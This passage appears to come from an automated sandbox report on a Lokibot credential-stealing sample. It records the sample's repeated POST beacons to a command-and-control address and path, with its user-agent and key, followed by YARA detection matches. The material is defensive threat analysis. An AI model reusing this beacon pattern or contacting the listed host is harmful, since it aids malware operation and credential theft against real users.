                  Nov 25, 2021 18:23:55.525480032 CET | 8084 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:55 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  42 | 192.168.2.3 | 49858 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:23:56.479058027 CET | 8085 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:57.486293077 CET | 8086 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:56 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  43 | 192.168.2.3 | 49859 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:23:59.056904078 CET | 8087 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:23:59.210263968 CET | 8088 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:23:59 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  44 | 192.168.2.3 | 49860 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:24:00.760570049 CET | 8088 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:24:00.858030081 CET | 8089 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:24:00 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  45 | 192.168.2.3 | 49861 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:24:02.488225937 CET | 8090 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:24:02.585421085 CET | 8090 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:24:02 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  46 | 192.168.2.3 | 49862 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:24:04.158303976 CET | 8091 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:24:04.667956114 CET | 8091 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:24:04 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  47 | 192.168.2.3 | 49863 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:24:06.231426001 CET | 8092 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:24:06.343086958 CET | 8094 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:24:06 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  48 | 192.168.2.3 | 49865 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:24:07.945362091 CET | 8100 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:24:08.055053949 CET | 8101 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:24:07 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  49 | 192.168.2.3 | 49866 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:24:09.150415897 CET | 8102 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:24:09.249567986 CET | 8102 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:24:09 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  5 | 192.168.2.3 | 49749 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:22:26.868772030 CET | 1087 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:26.965337992 CET | 1088 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:26 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  50 | 192.168.2.3 | 49867 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:24:11.256726027 CET | 8103 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:24:11.963359118 CET | 8104 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:24:11 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  6 | 192.168.2.3 | 49750 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:22:28.257549047 CET | 1088 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:28.383367062 CET | 1089 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:28 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  7 | 192.168.2.3 | 49751 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:22:29.608133078 CET | 1090 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:30.439112902 CET | 1090 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:29 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  8 | 192.168.2.3 | 49752 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:22:31.618849993 CET | 1091 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:32.376492023 CET | 1092 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:31 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  9 | 192.168.2.3 | 49755 | 194.85.248.167 | 80 | C:\Users\user\Desktop\U001P56ybm.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Nov 25, 2021 18:22:35.179306030 CET | 1115 | OUT | POST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:35.268660069 CET | 1116 | IN | HTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:35 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Code Manipulations

                  Statistics

                  Behavior

                  System Behavior

                  General

                  Start time:18:22:06
                  Start date:25/11/2021
                  Path:C:\Users\user\Desktop\U001P56ybm.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\U001P56ybm.exe"
                  Imagebase:0x400000
                  File size:301040 bytes
                  MD5 hash:969E2CCFCACF3573DE922D9BCE81E3FD
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000000.00000002.295055128.0000000002430000.00000004.00000001.sdmp, Author: Florian Roth
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.295055128.0000000002430000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.295055128.0000000002430000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.295055128.0000000002430000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: Loki_1, Description: Loki Payload, Source: 00000000.00000002.295055128.0000000002430000.00000004.00000001.sdmp, Author: kevoreilly
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.295055128.0000000002430000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:low

                  General

                  Start time:18:22:08
                  Start date:25/11/2021
                  Path:C:\Users\user\Desktop\U001P56ybm.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\U001P56ybm.exe"
                  Imagebase:0x400000
                  File size:301040 bytes
                  MD5 hash:969E2CCFCACF3573DE922D9BCE81E3FD
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                  • Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Author: kevoreilly
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000000.288584789.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000000.288584789.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000000.288584789.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000000.288584789.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000000.288584789.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000002.00000002.544999471.00000000005D8000.00000004.00000020.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000000.291339925.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000000.291339925.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000000.291339925.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000000.291339925.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000000.291339925.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000000.292089412.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000000.292089412.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000000.292089412.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000000.292089412.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000000.292089412.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000000.287455662.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000000.287455662.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000000.287455662.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000000.287455662.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000000.287455662.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.544827216.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000002.544827216.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000002.544827216.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000002.544827216.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000002.544827216.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:low

                  Disassembly

                  Code Analysis

                  Reset < >